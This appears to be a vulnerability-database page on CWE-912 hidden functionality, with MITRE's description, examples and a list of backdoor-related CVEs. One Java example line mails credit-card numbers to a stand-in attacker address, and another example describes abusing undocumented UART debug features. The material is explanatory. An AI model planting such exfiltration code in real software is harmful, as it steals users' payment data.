Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CWE-912 (隐藏功能) — Vulnerability Class 69

69 vulnerabilities classified as CWE-912 (隐藏功能). AI Chinese analysis included.

CWE-912 represents a software weakness where undocumented, unspecified, or non-obvious functionality exists within a product, often bypassing standard user interfaces or administrative controls. This vulnerability is typically exploited by attackers who discover these hidden pathways, such as debug ports, developer shortcuts, or intentional backdoors, to gain unauthorized access or execute malicious actions without detection. Developers can mitigate this risk by enforcing strict code reviews to identify and remove unnecessary or obscure code paths, ensuring comprehensive documentation of all features, and implementing rigorous access controls that restrict visibility to only intended, documented interfaces. By adhering to secure coding standards and maintaining clear separation between production and development code, organizations can eliminate unintended entry points, thereby reducing the attack surface and preventing adversaries from leveraging hidden mechanisms for unauthorized system manipulation or data exfiltration.

MITRE CWE Description
The product contains functionality that is not documented, not part of the specification, and not accessible through an interface or command sequence that is obvious to the product's users or administrators. Hidden functionality can take many forms, such as intentionally malicious code, "Easter Eggs" that contain extraneous functionality such as games, developer-friendly shortcuts that reduce maintenance or support costs such as hard-coded accounts, etc. From a security perspective, even when the functionality is not intentionally malicious or damaging, it can increase the product's attack surface and expose additional weaknesses beyond what is already exposed by the intended functionality. Even if it is not easily accessible, the hidden functionality could be useful for attacks that modify the control flow of the application.
Common Consequences (1)
Other, IntegrityVaries by Context, Alter Execution Logic
Mitigations (1)
InstallationAlways verify the integrity of the product that is being installed.
Examples (2)
In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
Bad · Java
Consider a device that comes with various security measures, such as secure boot. The secure-boot process performs firmware-integrity verification at boot time, and this code is stored in a separate SPI-flash device. However, this code contains undocumented "special access features" intended to be used only for performing failure analysis and intended to only be unlocked by the device designer.
Attackers dump the code from the device and then perform reverse engineering to analyze the code. The undocumented, special-access features are identified, and attackers can activate them by sending specific commands via UART before secure-boot phase completes. Using these hidden features, attackers can perform reads and writes to memory via the UART interface. At runtime, the attackers can also execute arbitrary code and dump the entire memory contents.
Bad · Other
CVE IDTitleCVSSSeverityPublished
CVE-2021-24867 Backdoored Plugins & Themes from AccessPress Themes — Frontend Post WordPress Plugin – AccessPress Anonymous Post 9.4 -2022-02-21
CVE-2021-43987 mySCADA myPRO — myPRO 9.8 Critical2021-12-23
CVE-2020-28593 amazon COSORI Smart 安全漏洞 — Cosori 8.1 -2021-04-15
CVE-2021-25371 Samsung SMR 安全漏洞 — Samsung Mobile Devices 6.1 Medium2021-03-26
CVE-2020-3352 Cisco Firepower Threat Defense Software Hidden Commands Vulnerability — Cisco Firepower Threat Defense Software 5.5 -2020-10-21
CVE-2020-12504 Pepperl+Fuchs improper authorization affects multiple Comtrol RocketLinx products — P+F Comtrol RocketLinx 9.8 Critical2020-10-15
CVE-2020-16204 Red Lion N-Tron 安全漏洞 — N-Tron 702-W / 702M12-W 9.8 -2020-09-01
CVE-2020-14487 OpenClinic GA — OpenClinic GA 9.4 Critical2020-07-29
CVE-2018-17919 Xiongmai XMeye P2P Cloud Server 安全漏洞 — XMeye P2P Cloud Server 8.2 -2018-10-10

Vulnerabilities classified as CWE-912 (隐藏功能) represent 69 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.